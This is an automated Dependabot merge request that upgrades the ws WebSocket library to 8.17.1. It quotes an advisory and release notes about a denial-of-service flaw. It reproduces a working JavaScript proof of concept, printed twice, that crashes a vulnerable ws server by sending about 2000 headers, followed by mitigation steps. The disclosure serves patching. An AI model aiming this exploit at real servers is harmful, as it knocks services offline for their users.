[Security] Bump ws from 8.17.0 to 8.17.1
Bumps ws from 8.17.0 to 8.17.1. This update includes a security fix.
Vulnerabilities fixed
ws affected by a DoS when handling a request with many HTTP headers
Impact
A request with a number of headers exceeding the[
server.maxHeadersCount
][] threshold could be used to crash a ws server.Proof of concept
const http = require('http'); const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; </tr></table>
... (truncated)
Patched versions: 8.17.1 Affected versions: >= 8.0.0, < 8.17.1
Release notes
Sourced from ws's releases.
8.17.1
Bug fixes
- Fixed a DoS vulnerability (#2231).
A request with a number of headers exceeding the[
server.maxHeadersCount
][] threshold could be used to crash a ws server.const http = require('http'); const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: wss.address().port }); request.end(); });
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.
In vulnerable versions of ws, the issue can be mitigated in the following ways:
- Reduce the maximum allowed length of the request headers using the [
--max-http-header-size=size
][] and/or the [maxHeaderSize
][] options so that no more headers than theserver.maxHeadersCount
limit can be sent.
... (truncated)
Commits
Dependabot commands
You can trigger Dependabot actions by commenting on this MR
-
$dependabot recreate
will recreate this MR rewriting all the manual changes and resolving conflicts